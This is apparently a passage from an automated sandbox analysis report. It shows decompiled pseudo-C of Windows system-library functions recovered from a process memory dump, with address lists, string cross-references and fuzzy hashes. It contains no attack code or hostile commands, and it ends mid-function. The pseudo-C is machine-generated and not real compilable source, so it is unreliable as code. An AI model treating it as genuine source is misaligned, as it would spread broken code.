E010EF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) { intOrPtr _v8; intOrPtr _v12; intOrPtr _v16; char* _v20; intOrPtr _v24; char _v28; intOrPtr _v32; char _v36; char _v44; char _v52; intOrPtr _v56; char _v60; intOrPtr _v72; void* _t51; void* _t58; signed short _t82; short _t84; signed int _t91; signed int _t100; signed short* _t103; void* _t108; intOrPtr* _t109; _t103 = __ecx; _t82 = __edx; _t51 = E010D4120(0, __ecx, 0, &_v52, 0, 0, 0); if(_t51 >= 0) { _push(0x21); _push(3); _v56 = *0x7ffe02dc; _v20 = &_v52; _push( &_v44); _v28 = 0x18; _push( &_v28); _push(0x100020); _v24 = 0; _push( &_v60); _v16 = 0x40; _v12 = 0; _v8 = 0; _t58 = E010F9830(); _t87 = *[fs:0x30]; _t108 = _t58; L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72); if(_t108 < 0) { L11: _t51 = _t108; } else { _push(4); _push(8); _push( &_v36); _push( &_v44); _push(_v60); _t108 = E010F9990(); if(_t108 < 0) { L10: _push(_v60); E010F95D0(); goto L11; } else { _t109 = L010D4620(_t87, *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18); if(_t109 == 0) { _t108 = 0xc0000017; goto L10; } else { _t21 = _t109 + 0x18; // 0x18 *((intOrPtr*)(_t109 + 4)) = _v60; *_t109 = 1; *((intOrPtr*)(_t109 + 0x10)) = _t21; *(_t109 + 0xe) = _t82; *((intOrPtr*)(_t109 + 8)) = _v56; *((intOrPtr*)(_t109 + 0x14)) = _v32; E010FF3E0(_t21, _t103[2], *_t103 & 0x0000ffff); *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0; *((short*)(_t109 + 0xc)) = *_t103; _t91 = *_t103 & 0x0000ffff; _t100 = _t91 & 0xfffffffe; _t84 = 0x5c; if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) { if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) { _push(_v60); E010F95D0(); L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109); _t51 = 0xc0000106; } else { *((short*)(_t100 + *((intOrPtr*)(_t109 + 0x10)))) = _t84; *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0; *((short*)(_t109 + 0xc)) = *((short*)(_t109 + 0xc)) + 2; goto L5; } } else { L5: *_a4 = _t109; _t51 = 0; } } } } } return _t51; } 0x010ef0d3 0x010ef0d9 0x010ef0e0 0x010ef0e7 0x010ef0f2 0x010ef0f4 0x010ef0f8 0x010ef100 0x010ef108 0x010ef10d 0x010ef115 0x010ef116 0x010ef11f 0x010ef123 0x010ef124 0x010ef12c 0x010ef130 0x010ef134 0x010ef13d 0x010ef144 0x010ef14b 0x010ef152 0x0112bab0 0x0112bab0 0x010ef158 0x010ef158 0x010ef15a 0x010ef160 0x010ef165 0x010ef166 0x010ef16f 0x010ef173 0x0112baa7 0x0112baa7 0x0112baab 0x00000000 0x010ef179 0x010ef18d 0x010ef191 0x0112baa2 0x00000000 0x010ef197 0x010ef19b 0x010ef1a2 0x010ef1a9 0x010ef1af 0x010ef1b2 0x010ef1b6 0x010ef1b9 0x010ef1c4 0x010ef1d8 0x010ef1df 0x010ef1e3 0x010ef1eb 0x010ef1ee 0x010ef1f4 0x010ef20f 0x0112bab7 0x0112babb 0x0112bacc 0x0112bad1 0x010ef215 0x010ef218 0x010ef226 0x010ef22b 0x00000000 0x010ef22b 0x010ef1f6 0x010ef1f6 0x010ef1f9 0x010ef1fb 0x010ef1fb 0x010ef1f4 0x010ef191 0x010ef173 0x010ef152 0x010ef203

Strings

@ , xrefs: 010EF124

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: @ API String ID: 0-2766056989 Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9 Instruction ID: 2f4021fbefd29dc453461c440dfb24d811b1f9ce3c372c053b104794496b5b4d Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9 Instruction Fuzzy Hash: C1518D726047119FC320DF29C841AABBBF8FF58710F00892EFA9587690E7B4E914CB91

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 75%

E01133540(intOrPtr _a4) { signed int _v12; intOrPtr _v88; intOrPtr _v92; char _v96; char _v352; char _v1072; intOrPtr _v1140; intOrPtr _v1148; char _v1152; char _v1156; char _v1160; char _v1164; char _v1168; char* _v1172; short _v1174; char _v1176; char _v1180; char _v1192; void* __ebx; void* __edi; void* __esi; void* __ebp; short _t41; short _t42; intOrPtr _t80; intOrPtr _t81; signed int _t82; void* _t83; _v12 = *0x11ad360 ^ _t82; _t41 = 0x14; _v1176 = _t41; _t42 = 0x16; _v1174 = _t42; _v1164 = 0x100; _v1172 = L"BinaryHash"; _t81 = E010F0BE0(0xfffffffc, &_v352, &_v1164, 0, 0, 0, &_v1192); if(_t81 < 0) { L11: _t75 = _t81; E01133706(0, _t81, _t79, _t80); L12: if(_a4 != 0xc000047f) { E010FFA60( &_v1152, 0, 0x50); _v1152 = 0x60c201e; _v1148 = 1; _v1140 = E01133540; E010FFA60( &_v1072, 0, 0x2cc); _push( &_v1072); E0110DDD0( &_v1072, _t75, _t79, _t80, _t81); E01140C30(0, _t75, _t80, &_v1152, &_v1072, 2); _push(_v1152); _push(0xffffffff); E010F97C0(); } return E010FB640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81); } _t79 = &_v352; _t81 = E01133971(0, _a4, &_v352, &_v1156); if(_t81 < 0) { goto L11; } _t75 = _v1156; _t79 = &_v1160; _t81 = E01133884(_v1156, &_v1160, &_v1168); if(_t81 >= 0) { _t80 = _v1160; E010FFA60( &_v96, 0, 0x50); _t83 = _t83 + 0xc; _push( &_v1180); _push(0x50); _push( &_v96); _push(2); _push( &_v1176); _push(_v1156); _t81 = E010F9650(); if(_t81 >= 0) { if(_v92 != 3 || _v88 == 0) { _t81 = 0xc000090b; } if(_t81 >= 0) { _t75 = _a4; _t79 = &_v352; E01133787(_a4, &_v352, _t80); } } L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168); } _push(_v1156); E010F95D0(); if(_t81 >= 0) { goto L12; } else { goto L11; } } 0x01133552 0x0113355a 0x0113355d 0x01133566 0x01133567 0x0113357e 0x0113358f 0x011335a1 0x011335a5 0x0113366b 0x0113366b 0x0113366d 0x01133672 0x01133679 0x01133685 0x0113368d 0x0113369d 0x011336a7 0x011336b8 0x011336c6 0x011336c7 0x011336dc 0x011336e1 0x011336e7 0x011336e9 0x011336e9 0x01133703 0x01133703 0x011335b5 0x011335c0 0x011335c4 0x00000000 0x00000000 0x011335ca 0x011335d7 0x011335e2 0x011335e6 0x011335e8 0x011335f5 0x011335fa 0x01133603 0x01133604 0x01133609 0x0113360a 0x01133612 0x01133613 0x0113361e 0x01133622 0x01133628 0x0113362f 0x0113362f 0x01133636 0x01133638 0x0113363b 0x01133642 0x01133642 0x01133636 0x01133657 0x01133657 0x0113365c 0x01133662 0x01133669 0x00000000 0x00000000 0x00000000 0x00000000

Strings

BinaryHash , xrefs: 0113358F

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: BinaryHash API String ID: 0-2202222882 Opcode ID: 8b551dea72c832c1e467c010bfd0859d767d9a2c550d183377f70b8cd477e051 Instruction ID: 750b2552a492c15d72081aa1ad34c1e3cc16ef2a4b771a7f491afc6e3ff51627 Opcode Fuzzy Hash: 8b551dea72c832c1e467c010bfd0859d767d9a2c550d183377f70b8cd477e051 Instruction Fuzzy Hash: 204132F2D1052D9FDB259A50CC81FDEB77CAB44718F0045A9EB19AB240DB309F888F98

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 71%

E011805AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) { signed int _v20; char _v24; signed int _v28; char _v32; signed int _v36; intOrPtr _v40; void* __ebx; void* _t35; signed int _t42; char* _t48; signed int _t59; signed char _t61; signed int* _t79; void* _t88; _v28 = __edx; _t79 = __ecx; if(E011807DF(__ecx, __edx, &_a4, &_a8, 0) == 0) { L13: _t35 = 0; L14: return _t35; } _t61 = __ecx[1]; _t59 = __ecx[0xf]; _v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx); _v36 = _a8 << 0xc; _t42 = *(_t59 + 0xc) & 0x40000000; asm("sbb esi, esi"); _t88 = ( ~_t42 & 0x0000003c) + 4; if(_t42 != 0) { _push(0); _push(0x14); _push( &_v24); _push(3); _push(_t59); _push(0xffffffff); if(E010F9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) { _push(_t61); E0117A80D(_t59, 1, _v20, 0); _t88 = 4; } } _t35 = E0117A854( &_v32, &_v36, 0, 0x1000, _t88, 0, *((intOrPtr*)(_t79 + 0x34)), *((intOrPtr*)(_t79 + 0x38))); if(_t35 < 0) { goto L14; } E01181293(_t79, _v40, E011807DF(_t79, _v28, &_a4, &_a8, 1)); if(E010D7D50() == 0) { _t48 = 0x7ffe0380; } else { _t48 = *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226; } if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) { E0117138A(_t59, *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa); } goto L13; } 0x011805c5 0x011805ca 0x011805d3 0x011806db 0x011806db 0x011806dd 0x011806e3 0x011806e3 0x011805dd 0x011805e7 0x011805f6 0x01180600 0x01180607 0x01180610 0x01180615 0x0118061a 0x0118061c 0x0118061e 0x01180624 0x01180625 0x01180627 0x01180628 0x01180631 0x01180640 0x0118064d 0x01180654 0x01180654 0x01180631 0x0118066d 0x01180674 0x00000000 0x00000000 0x01180692 0x0118069e 0x011806b0 0x011806a0 0x011806a9 0x011806a9 0x011806b8 0x011806d6 0x011806d6 0x00000000

Strings

` , xrefs: 01180633

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: ` API String ID: 0-2679148245 Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3 Instruction ID: 43321769f8e650023c748290e0d3931c33f5803490c92e98af51b6c93a1d91ea Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3 Instruction Fuzzy Hash: 5B3108322047096BE714EE18CC45F977BD9FBC8758F248125FA549B280D770E908CB91

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 72%

E01133884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) { char _v8; intOrPtr _v12; intOrPtr* _v16; char* _v20; short _v22; char _v24; intOrPtr _t38; short _t40; short _t41; void* _t44; intOrPtr _t47; void* _t48; _v16 = __edx; _t40 = 0x14; _v24 = _t40; _t41 = 0x16; _v22 = _t41; _t38 = 0; _v12 = __ecx; _push( &_v8); _push(0); _push(0); _push(2); _t43 = &_v24; _v20 = L"BinaryName"; _push( &_v24); _push(__ecx); _t47 = 0; _t48 = E010F9650(); if(_t48 >= 0) { _t48 = 0xc000090b; } if(_t48 != 0xc0000023) { _t44 = 0; L13: if(_t48 < 0) { L16: if(_t47 != 0) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47); } L18: return _t48; } *_v16 = _t38; *_a4 = _t47; goto L18; } _t47 = L010D4620(_t43, *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8); if(_t47 != 0) { _push( &_v8); _push(_v8); _push(_t47); _push(2); _push( &_v24); _push(_v12); _t48 = E010F9650(); if(_t48 < 0) { _t44 = 0; goto L16; } if( *((intOrPtr*)(_t47 + 4)) != 1 || *(_t47 + 8) < 4) { _t48 = 0xc000090b; } _t44 = 0; if(_t48 < 0) { goto L16; } else { _t17 = _t47 + 0xc; // 0xc _t38 = _t17; if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) { _t48 = 0xc000090b; } goto L13; } } _t48 = _t48 + 0xfffffff4; goto L18; } 0x01133893 0x01133896 0x01133899 0x0113389f 0x011338a0 0x011338a4 0x011338a9 0x011338ac 0x011338ad 0x011338ae 0x011338af 0x011338b1 0x011338b4 0x011338bb 0x011338bc 0x011338bd 0x011338c4 0x011338c8 0x011338ca 0x011338ca 0x011338d5 0x0113393e 0x01133940 0x01133942 0x01133952 0x01133954 0x01133961 0x01133961 0x01133967 0x0113396e 0x0113396e 0x01133947 0x0113394c 0x00000000 0x0113394c 0x011338ea 0x011338ee 0x011338f8 0x011338f9 0x011338ff 0x01133900 0x01133902 0x01133903 0x0113390b 0x0113390f 0x01133950 0x00000000 0x01133950 0x01133915 0x0113391d 0x0113391d 0x01133922 0x01133926 0x00000000 0x01133928 0x0113392b 0x0113392b 0x01133935 0x01133937 0x01133937 0x00000000 0x01133935 0x01133926 0x011338f0 0x00000000

Strings

BinaryName , xrefs: 011338B4

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: BinaryName API String ID: 0-215506332 Opcode ID: c90671ef5535efacb4aa7356924646b865ed831afb05b4c07c5897041db3f931 Instruction ID: b1e9cc8d969e1e230c5e945163a049c841180a83cc6ac5c6f0068c9018107c43 Opcode Fuzzy Hash: c90671ef5535efacb4aa7356924646b865ed831afb05b4c07c5897041db3f931 Instruction Fuzzy Hash: 3D310532D0050AEFEB19DA58C945EABFB74FB80720F024169E964A7294E7309E00C7A5

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 33%

E010ED294(void* __ecx, char __edx, void* __eflags) { signed int _v8; char _v52; signed int _v56; signed int _v60; intOrPtr _v64; char* _v68; intOrPtr _v72; char _v76; signed int _v84; intOrPtr _v88; char _v92; intOrPtr _v96; intOrPtr _v100; char _v104; char _v105; void* __ebx; void* __edi; void* __esi; signed int _t35; char _t38; signed int _t40; signed int _t44; signed int _t52; void* _t53; void* _t55; void* _t61; intOrPtr _t62; void* _t64; signed int _t65; signed int _t66; _t68 = (_t66 & 0xfffffff8) - 0x6c; _v8 = *0x11ad360 ^ (_t66 & 0xfffffff8) - 0x0000006c; _v105 = __edx; _push( &_v92); _t52 = 0; _push(0); _push(0); _push( &_v104); _push(0); _t59 = __ecx; _t55 = 2; if(E010D4120(_t55, __ecx) < 0) { _t35 = 0; L8: _pop(_t61); _pop(_t64); _pop(_t53); return E010FB640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64); } _v96 = _v100; _t38 = _v92; if(_t38 != 0) { _v104 = _t38; _v100 = _v88; _t40 = _v84; } else { _t40 = 0; } _v72 = _t40; _v68 = &_v104; _push( &_v52); _v76 = 0x18; _push( &_v76); _v64 = 0x40; _v60 = _t52; _v56 = _t52; _t44 = E010F98D0(); _t62 = _v88; _t65 = _t44; if(_t62 != 0) { asm("lock xadd [edi], eax"); if((_t44 | 0xffffffff) != 0) { goto L4; } _push( *((intOrPtr*)(_t62 + 4))); E010F95D0(); L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62); goto L4; } else { L4: L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96); if(_t65 >= 0) { _t52 = 1; } else { if(_t65 == 0xc0000043 || _t65 == 0xc0000022) { _t52 = _t52 & 0xffffff00 | _v105 != _t52; } } _t35 = _t52; goto L8; } } 0x010ed29c 0x010ed2a6 0x010ed2b1 0x010ed2b5 0x010ed2b6 0x010ed2bc 0x010ed2bd 0x010ed2be 0x010ed2bf 0x010ed2c2 0x010ed2c4 0x010ed2cc 0x010ed384 0x010ed34b 0x010ed34f 0x010ed350 0x010ed351 0x010ed35c 0x010ed35c 0x010ed2d6 0x010ed2da 0x010ed2e1 0x010ed361 0x010ed369 0x010ed36d 0x010ed2e3 0x010ed2e3 0x010ed2e3 0x010ed2e5 0x010ed2ed 0x010ed2f5 0x010ed2fa 0x010ed302 0x010ed303 0x010ed30b 0x010ed30f 0x010ed313 0x010ed318 0x010ed31c 0x010ed320 0x010ed379 0x010ed37d 0x00000000 0x00000000 0x0112affe 0x0112b001 0x0112b011 0x00000000 0x010ed322 0x010ed322 0x010ed330 0x010ed337 0x010ed35d 0x010ed339 0x010ed33f 0x010ed38c 0x010ed38c 0x010ed33f 0x010ed349 0x00000000 0x010ed349

Strings

@ , xrefs: 010ED303

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: @ API String ID: 0-2766056989 Opcode ID: 0fbba4325bef5b1d3754cf33350e95d2fb92afaaa3c53ff1ead9c418afeccdf3 Instruction ID: 627886823be226ebcdc821b03d06016cdad1f143ba5d7cc73fd85471d523244c Opcode Fuzzy Hash: 0fbba4325bef5b1d3754cf33350e95d2fb92afaaa3c53ff1ead9c418afeccdf3 Instruction Fuzzy Hash: 6D31DFB5508301AFC321DF69C984AAFBBE8FF89654F00492EF9D483650D634DD04CB92

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 72%

E010C1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) { intOrPtr _v8; char _v16; intOrPtr* _t26; intOrPtr _t29; void* _t30; signed int _t31; _t27 = __ecx; _t29 = __edx; _t31 = 0; _v8 = __edx; if(__edx == 0) { L18: _t30 = 0xc000000d; goto L12; } else { _t26 = _a4; if(_t26 == 0 || _a8 == 0 || __ecx == 0) { goto L18; } else { E010FBB40(__ecx, &_v16, __ecx); _push(_t26); _push(0); _push(0); _push(_t29); _push( &_v16); _t30 = E010FA9B0(); if(_t30 >= 0) { _t19 = *_t26; if( *_t26 != 0) { goto L7; } else { *_a8 = *_a8 & 0; } } else { if(_t30 != 0xc0000023) { L9: _push(_t26); _push( *_t26); _push(_t31); _push(_v8); _push( &_v16); _t30 = E010FA9B0(); if(_t30 < 0) { L12: if(_t31 != 0) { L010D77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31); } } else { *_a8 = _t31; } } else { _t19 = *_t26; if( *_t26 == 0) { _t31 = 0; } else { L7: _t31 = L010D4620(_t27, *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19); } if(_t31 == 0) { _t30 = 0xc0000017; } else { goto L9; } } } } } return _t30; } 0x010c1b8f 0x010c1b9a 0x010c1b9c 0x010c1b9e 0x010c1ba3 0x01117010 0x01117010 0x00000000 0x010c1ba9 0x010c1ba9 0x010c1bae 0x00000000 0x010c1bc5 0x010c1bca 0x010c1bcf 0x010c1bd0 0x010c1bd1 0x010c1bd2 0x010c1bd6 0x010c1bdc 0x010c1be0 0x01116ffc 0x01117000 0x00000000 0x01117006 0x01117009 0x01117009 0x010c1be6 0x010c1bec 0x010c1c0b 0x010c1c0b 0x010c1c0c 0x010c1c11 0x010c1c12 0x010c1c15 0x010c1c1b 0x010c1c1f 0x010c1c31 0x010c1c33 0x01117026 0x01117026 0x010c1c21 0x010c1c24 0x010c1c24 0x010c1bee 0x010c1bee 0x010c1bf2 0x010c1c3a 0x010c1bf4 0x010c1bf4 0x010c1c05 0x010c1c05 0x010c1c09 0x010c1c3e 0x00000000 0x00000000 0x00000000 0x010c1c09 0x010c1bec 0x010c1be0 0x010c1bae 0x010c1c2e

Strings

WindowsExcludedProcs , xrefs: 010C1BC5

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: WindowsExcludedProcs API String ID: 0-3583428290 Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca Instruction ID: 675c5b65396f80afdb14d9fac4380c6cc140278b267821bf1194a5d1173a5145 Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca Instruction Fuzzy Hash: 8A21F87A60021DEBDB22DB59D880F9FBBADAF45A50F054479FA448B205D630DD01CBA1

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 100%

E010DF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) { intOrPtr _t13; intOrPtr _t14; signed int _t16; signed char _t17; intOrPtr _t19; intOrPtr _t21; intOrPtr _t23; intOrPtr* _t25; _t25 = _a8; _t17 = __ecx; if(_t25 == 0) { _t19 = 0xc00000f2; L8: return _t19; } if((__ecx & 0xfffffffe) != 0) { _t19 = 0xc00000ef; goto L8; } _t19 = 0; *_t25 = 0; _t21 = 0; _t23 = "Actx "; if(__edx != 0) { if(__edx == 0xfffffffc) { L21: _t21 = 0x200; L5: _t13 = *((intOrPtr*)( *[fs:0x30] + _t21)); *_t25 = _t13; L6: if(_t13 == 0) { if((_t17 & 0x00000001) != 0) { *_t25 = _t23; } } L7: goto L8; } if(__edx == 0xfffffffd) { *_t25 = _t23; _t13 = _t23; goto L6; } _t13 = *((intOrPtr*)(__edx + 0x10)); *_t25 = _t13; L14: if(_t21 == 0) { goto L6; } goto L5; } _t14 = _a4; if(_t14 != 0) { _t16 = *(_t14 + 0x14) & 0x00000007; if(_t16 <= 1) { _t21 = 0x1f8; _t13 = 0; goto L14; } if(_t16 == 2) { goto L21; } if(_t16 != 4) { _t19 = 0xc00000f0; goto L7; } _t13 = 0; goto L6; } else { _t21 = 0x1f8; goto L5; } } 0x010df71d 0x010df722 0x010df726 0x01124770 0x010df765 0x010df769 0x010df769 0x010df732 0x0112477a 0x00000000 0x0112477a 0x010df738 0x010df73a 0x010df73c 0x010df73f 0x010df746 0x010df778 0x010df7a9 0x010df7a9 0x010df754 0x010df75a 0x010df75d 0x010df75f 0x010df761 0x010df76f 0x010df771 0x010df771 0x010df76f 0x010df763 0x00000000 0x010df763 0x010df77d 0x010df7a3 0x010df7a5 0x00000000 0x010df7a5 0x010df77f 0x010df782 0x010df784 0x010df786 0x00000000 0x00000000 0x00000000 0x010df788 0x010df748 0x010df74d 0x010df78d 0x010df793 0x010df7b7 0x010df7bc 0x00000000 0x010df7bc 0x010df798 0x00000000 0x00000000 0x010df79d 0x010df7b0 0x00000000 0x010df7b0 0x010df79f 0x00000000 0x010df74f 0x010df74f 0x00000000 0x010df74f

Strings

Actx , xrefs: 010DF73F

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: Actx API String ID: 0-89312691 Opcode ID: 0d26a2cdc09c5186443166905052c9a6646965efd19d0a31fc995585986d9b42 Instruction ID: 7706675add4666a432382643f69b5dacca7fe8b42eb2f6b77aa8a125938f933b Opcode Fuzzy Hash: 0d26a2cdc09c5186443166905052c9a6646965efd19d0a31fc995585986d9b42 Instruction Fuzzy Hash: 7611D034304B038BEBA94E1DC8907BA76D5BB85264F27C56AE5E7CB791DB70C8438340

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 71%

E01168DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) { intOrPtr _t35; void* _t41; _t40 = __esi; _t39 = __edi; _t38 = __edx; _t35 = __ecx; _t34 = __ebx; _push(0x74); _push(0x1190d50); E0110D0E8(__ebx, __edi, __esi); *((intOrPtr*)(_t41 - 0x7c)) = __edx; *((intOrPtr*)(_t41 - 0x74)) = __ecx; if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) { E01145720(0x65, 0, "Critical error detected %lx\n", _t35); if( *((intOrPtr*)(_t41 + 8)) != 0) { *(_t41 - 4) = *(_t41 - 4) & 0x00000000; asm("int3"); *(_t41 - 4) = 0xfffffffe; } } *(_t41 - 4) = 1; *((intOrPtr*)(_t41 - 0x70)) = *((intOrPtr*)(_t41 - 0x74)); *((intOrPtr*)(_t41 - 0x6c)) = 1; *(_t41 - 0x68) = *(_t41 - 0x68) & 0x00000000; *((intOrPtr*)(_t41 - 0x64)) = L0110DEF0; *((intOrPtr*)(_t41 - 0x60)) = 1; *((intOrPtr*)(_t41 - 0x5c)) = *((intOrPtr*)(_t41 - 0x7c)); _push(_t41 - 0x70); L0110DEF0(1, _t38); *(_t41 - 4) = 0xfffffffe; return E0110D130(_t34, _t39, _t40); } 0x01168df1 0x01168df1 0x01168df1 0x01168df1 0x01168df1 0x01168df1 0x01168df3 0x01168df8 0x01168dfd 0x01168e00 0x01168e0e 0x01168e2a 0x01168e36 0x01168e38 0x01168e3c 0x01168e46 0x01168e46 0x01168e36 0x01168e50 0x01168e56 0x01168e59 0x01168e5c 0x01168e60 0x01168e67 0x01168e6d 0x01168e73 0x01168e74 0x01168eb1 0x01168ebd

Strings

Critical error detected %lx , xrefs: 01168E21

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: Critical error detected %lx API String ID: 0-802127002 Opcode ID: 404493257b9d2dd754f69b2052da156b3d0586b1a3ae0457e1f411c6bf202ec2 Instruction ID: 3797a546e055d72382c67ff80d373cef32c64c08f22085d778c1d608bf468905 Opcode Fuzzy Hash: 404493257b9d2dd754f69b2052da156b3d0586b1a3ae0457e1f411c6bf202ec2 Instruction Fuzzy Hash: 14113575D15348DBDF29CFE8990579CBBB4AB14314F20826EE569AB282C7750602CF14

Uniqueness

Uniqueness Score: -1.00%

Strings

NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p , xrefs: 0114FF60

Memory Dump Source

Source File: 00000007.00000002.431895003.0000000001090000.00000040.00000001.sdmp, Offset: 01090000, based on PE: true

Associated: 00000007.00000002.432566539.00000000011AB000.00000040.00000001.sdmp Download File Associated: 00000007.00000002.432597012.00000000011AF000.00000040.00000001.sdmp Download File

Similarity

API ID: String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p API String ID: 0-1911121157 Opcode ID: 3e1616d738e8df48e80b032c76ca28dc876645b0ee9d22619dcf0e95d2e2b617 Instruction ID: 3f3d9c9634546516c66124855da92b08175e2886b685d7cb7566830d451042f5 Opcode Fuzzy Hash: 3e1616d738e8df48e80b032c76ca28dc876645b0ee9d22619dcf0e95d2e2b617 Instruction Fuzzy Hash: 1B112672910145EFDF2ADF98C948F987BB1FF08B08F548054F1086B2A1CB799941CB91

Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 88%

E01185BA5(void* __ebx, signed char __ecx, signed int* __edx, void* __edi, void* __esi, void* __eflags) { signed int _t296; signed char _t298; signed int _t301; signed int _t306; signed int _t310; signed char _t311; intOrPtr _t312; signed int _t313; void* _t327; signed int _t328; intOrPtr _t329; intOrPtr _t333; signed char _t334; signed int _t336; void* _t339; signed int _t340; signed int _t356; signed int _t362; short _t367; short _t368; short _t373; signed int _t380; void* _t382; short _t385; signed short _t392; signed char _t393; signed int _t395; signed char _t397; signed int _t398; signed short _t402; void* _t406; signed int _t412; signed char _t414; signed short _t416; signed int _t421; signed char _t427; intOrPtr _t434; signed char _t435; signed int _t436; signed int _t442; signed int _t446; signed int _t447; signed int _t451; signed int _t453; signed int _t454; signed int _t455; intOrPtr _t456; intOrPtr* _t457; short _t458; signed short _t462; signed int _t469; intOrPtr* _t474; signed int _t475; signed int _t479; signed int _t480; signed int _t481; short _t485; signed int _t491; signed int* _t494; signed int _t498; signed int _t505; intOrPtr _t506; signed short _t508; signed int _t511; void* _t517; signed int _t519; signed int _t522; void* _t523; signed int _t524; void* _t528; signed int _t529; _push(0xd4); _push(0x1191178); E0110D0E8(__ebx, __edi, __esi); _t494 = __edx; *(_t528 - 0xcc) = __edx; _t511 = __ecx; *((intOrPtr*)(_t528 - 0xb4)) = __ecx; *(_t528 - 0xbc) = __ecx; *((intOrPtr*)(_t528 - 0xc8)) = *((intOrPtr*)(_t528 + 0x20)); _t434 = *((intOrPtr*)(_t528 + 0x24)); *((intOrPtr*)(_t528 - 0xc4)) = _t434; _t427 = 